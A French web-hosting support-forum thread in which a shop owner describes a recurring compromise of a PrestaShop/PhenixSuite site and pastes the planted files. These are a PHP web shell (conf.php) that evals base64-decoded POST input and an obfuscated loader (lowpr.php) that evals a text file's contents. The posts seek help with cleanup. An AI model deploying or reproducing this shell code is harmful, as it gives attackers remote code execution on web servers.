J'ai oublié : j'ai passé cleaner.php après avoir supprimé les fichiers ...
Cela ne change rien dans les faits car ils reviennent ce qui signifie que l'infection vient d'un autre fichier ou d'une faille qui, lui /elle n'a pas été détecté ...
Récemment
-
Images produit qui disparaissent
Bugs & Améliorations il y a environ 11 jours15 -
Urls bizarres dans la console search
PhenixSuite il y a environ 15 jours12 -
Erreurs 410 dans BO
PhenixSuite il y a environ 15 jours3 -
la classe search
Bugs & Améliorations il y a environ 17 jours2 -
Probleme depuis MAJ phenix 1.6.2.36
PhenixSuite il y a environ 17 jours8 -
[resolu] Le module mondial relay 3.4.5
Bugs & Améliorations il y a environ 20 jours1 -
controlleur fournisseurs.
Bugs & Améliorations il y a environ 22 jours11 -
J'en profite (la fougue de la jeunesse) (ah ah ah)
Bugs & Améliorations il y a environ 23 jours5 -
Bon dernier du jour mais cela me turlupine classe search
Bugs & Améliorations il y a environ 23 jours4 -
se connecter comme un client idntifié
Bugs & Améliorations il y a environ 23 jours1 -
la bonne blague
Discussion générale il y a environ 25 jours2 -
Passage de la 16.1.9 a la PhenixSuite 1.6.2.36
Bugs & Améliorations il y a environ 29 jours8 -
Echec de l'installation de Creative Elements
Bugs & Améliorations 27 juin 2025, 15:123 -
[Résolu] Modification données client dans l'admin
PhenixSuite 27 juin 2025, 07:3410 -
googletagmanager
PhenixSuite 26 juin 2025, 15:052 -
2 téléphones obligatoires
PhenixSuite 21 juin 2025, 21:5411 -
Liens qui disparaissent
PhenixSuite 21 juin 2025, 17:545 -
Smart cache JS et Iphone
PhenixSuite 20 juin 2025, 23:121 -
Hack ancien PS 1.6 avant mise à jour Phenix
PhenixSuite 16 juin 2025, 07:423 -
[RESOLU]Souci Revolut et Hipay
Modules 14 juin 2025, 18:5511
RPro
@RPro
Messages postés par RPro
-
RE: Nouvelle attaque ?
-
RE: Nouvelle attaque ?
Le fichier 1.mcm.x86_64 est trop long pour être transmis tel quel.
Le fichier confcom.php est vide
Le fichier conf.php est le suivant :
<!DOCTYPE html>
<html>
<head>
<title>PHP command</title>
</head>
<body>
<form method="post" action="">
<input type="text" name="php" id="php">
<input type="submit" value="Execute">
</form>
<?php
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
$php = $_POST['php'];
$php = strtr($php, '-', '=');
$php = base64_decode($php);
if($php) {
$result = eval($php);
echo $result;
}
}
?>
</body>
</html>Le fichier lowpr.php est le suivant :
<?php
$table_prefix = "wbzaxsye6w4_duevcwondme";
$table_prefix = str_replace(array("z", "x", "y", "u", "v", "w", "n", "m"), "", $table_prefix);
$txt_contents = "1f2i3l4e5_6g7e8t9_0c1o2n3t4e5n6t7s8";
$txt_contents = preg_replace("/\d+/", "", $txt_contents);
$wp_content = $txt_contents("lowpr".".txt");
eval/Designed with utility, safety and style/($table_prefix($wp_content));
?>J'espère que cela vous donnera des idées car je suis pas compétent !
Merci par avance -
RE: Nouvelle attaque ?
Non !
Il y a bien des alertes de modification mais après vérification, c'est normal.
Aucune modification en rouge. -
Nouvelle attaque ?
Bonjour à tous,
Je constate sur mon presta certaines modifications anormales, en tout cas non souhaitées qui me laisse penser à une attaque.
Voici en quelques mots ce que j'ai pu observer :
Modification du htaccess
Creation de fichiers 1.mcm.x86_64, confcom.php, conf.php, lowpr.php,...
Malgré la suppression des fichiers indésirables et le rétablissement du htaccess, cela revient régulièrement.
J'ai passé le scan de sécurité cleaner.php de @eolia qui ne détecte pas de virus.
Quelqu'un a-t-il été confronté à cela auparavant ? Et si oui, quelles sont les actions à mener ?Merci pour vos réponses.